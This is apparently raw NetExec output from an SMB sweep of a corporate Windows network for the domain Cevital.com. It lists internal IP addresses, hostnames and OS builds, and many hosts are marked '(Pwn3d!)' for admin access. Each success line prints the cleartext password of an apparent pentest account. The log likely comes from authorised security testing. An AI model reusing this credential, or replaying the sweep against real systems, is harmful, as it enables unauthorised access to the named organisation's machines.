[03:26:45] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.194.66 445 OXOLT020084 [*] Windows 11 Build 22621 x64
(name:OXOLT020084) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.67 445 OXOLT020075 [*] Windows 11 Build 22621 x64
(name:OXOLT020075) (domain:Cevital.com) (signing:True) (SMBv1:False)
[03:26:46] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.194.68 445 OXOLT020002 [*] Windows 11 Build 22621 x64
(name:OXOLT020002) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.69 445 OXOLT020001 [*] Windows 11 Build 22621 x64
(name:OXOLT020001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.66 445 OXOLT020084 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.141 445 OXODT031521 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031521) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.146 445 OXODT033421 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033421) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.142 445 OXODT030611 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030611) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.133 445 OXODT031531 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031531) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.134 445 OXODT031811 [*] Windows 11 Build 22621 x64
(name:OXODT031811) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.140 445 OXODT031941 [*] Windows 11 Build 22621 x64
(name:OXODT031941) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.130 445 OXODT0316131 [*] Windows 11 Build 22621 x64
(name:OXODT0316131) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.132 445 OXODT033511 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033511) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.135 445 OXODT033911 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033911) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.154 445 OXODT032611 [*] Windows 11 Build 22621 x64
(name:OXODT032611) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.147 445 OXODT031011 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031011) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.136 445 OXFDT030003 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFDT030003) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.160 445 OXODT030911 [*] Windows 11 Build 22621 x64
(name:OXODT030911) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.139 445 OXODT030621 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030621) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.144 445 OXODT031931 [*] Windows 11 Build 22621 x64
(name:OXODT031931) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.131 445 OXODT030921 [*] Windows 11 Build 22621 x64
(name:OXODT030921) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.158 445 OXODT032711 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032711) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.143 445 OXODT031511 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031511) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.149 445 OXFLT030014 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030014) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.129 445 OXODT033021 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT033021) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.138 445 OXODT031911 [*] Windows 11 Build 22621 x64
(name:OXODT031911) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.155 445 OXODT030411 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030411) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.163 445 OXODT034111 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT034111) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.137 445 OXODT030711 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030711) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.164 445 OXODT031641 [*] Windows 11 Build 22621 x64
(name:OXODT031641) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.157 445 OXODT031711 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031711) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.151 445 OXODT031821 [*] Windows 11 Build 22621 x64
(name:OXODT031821) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.162 445 OXODT0316121 [*] Windows 11 Build 22621 x64
(name:OXODT0316121) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.148 445 OXODT031691 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031691) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.177 445 OXFLT030010 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030010) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.152 445 OXFLT030009 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030009) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.170 445 OXODT031671 [*] Windows 11 Build 22621 x64
(name:OXODT031671) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.161 445 OXFLT030016 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030016) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.179 445 OXODT034611 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT034611) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.174 445 OXODT034811 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT034811) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.150 445 OXODT031411 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031411) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.178 445 OXODT032521 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032521) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.165 445 OXODT032311 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032311) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.166 445 OXODT030311 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030311) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.175 445 OXODT034821 [*] Windows 11 Build 22621 x64
(name:OXODT034821) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.171 445 OXODT0316101 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT0316101) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.173 445 OXODT031311 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT031311) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.169 445 OXODT032511 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032511) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.176 445 OXODT031661 [*] Windows 11 Build 22621 x64
(name:OXODT031661) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.181 445 OXFLT030013 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXFLT030013) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.168 445 OXODT032211 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032211) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.167 445 OXODT034211 [*] Windows 11 Build 22621 x64
(name:OXODT034211) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.194.180 445 OXODT030211 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT030211) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.194.145 445 OXODT033431 [*] Windows 11 Build 22621 x64
(name:OXODT033431) (domain:Cevital.com) (signing:True) (SMBv1:False)
[03:26:49] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.67 445 OXOLT020075 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.68 445 OXOLT020002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.159 445 OXODT032811 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT032811) (domain:Cevital.com) (signing:True)
(SMBv1:False)
[03:26:53] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.69 445 OXOLT020001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.141 445 OXODT031521 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.146 445 OXODT033421 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:26:57] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
[03:26:58] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.142 445 OXODT030611 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:26:59] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
[03:27:00] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.133 445 OXODT031531 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:01] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.134 445 OXODT031811 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:03] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.140 445 OXODT031941 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:06] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.130 445 OXODT0316131 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:09] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.194.132 445 OXODT033511 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:27:11] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

[03:27:14] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.194.135 445 OXODT033911 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.154 445 OXODT032611 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.194.147 445 OXODT031011 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.136 445 OXFDT030003 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.160 445 OXODT030911 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.139 445 OXODT030621 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.144 445 OXODT031931 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.131 445 OXODT030921 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.158 445 OXODT032711 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.143 445 OXODT031511 [-] Connection Error: [Errno
104] Connection reset by peer
[03:27:24] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.194.149 445 OXFLT030014 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.129 445 OXODT033021 [-] Connection Error: [Errno
104] Connection reset by peer
[03:27:27] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.194.138 445 OXODT031911 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.155 445 OXODT030411 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.163 445 OXODT034111 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.137 445 OXODT030711 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.164 445 OXODT031641 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.157 445 OXODT031711 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.151 445 OXODT031821 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.162 445 OXODT0316121 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.148 445 OXODT031691 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.177 445 OXFLT030010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.152 445 OXFLT030009 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.170 445 OXODT031671 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.161 445 OXFLT030016 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.179 445 OXODT034611 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.174 445 OXODT034811 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.150 445 OXODT031411 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.178 445 OXODT032521 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.165 445 OXODT032311 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.166 445 OXODT030311 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.175 445 OXODT034821 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.171 445 OXODT0316101 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.173 445 OXODT031311 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.169 445 OXODT032511 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.176 445 OXODT031661 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.181 445 OXFLT030013 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.168 445 OXODT032211 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.167 445 OXODT034211 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.180 445 OXODT030211 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.145 445 OXODT033431 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.194.159 445 OXODT032811 [-] Connection Error: [Errno
104] Connection reset by peer
Running nxc against 65536 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100%
0:00:00
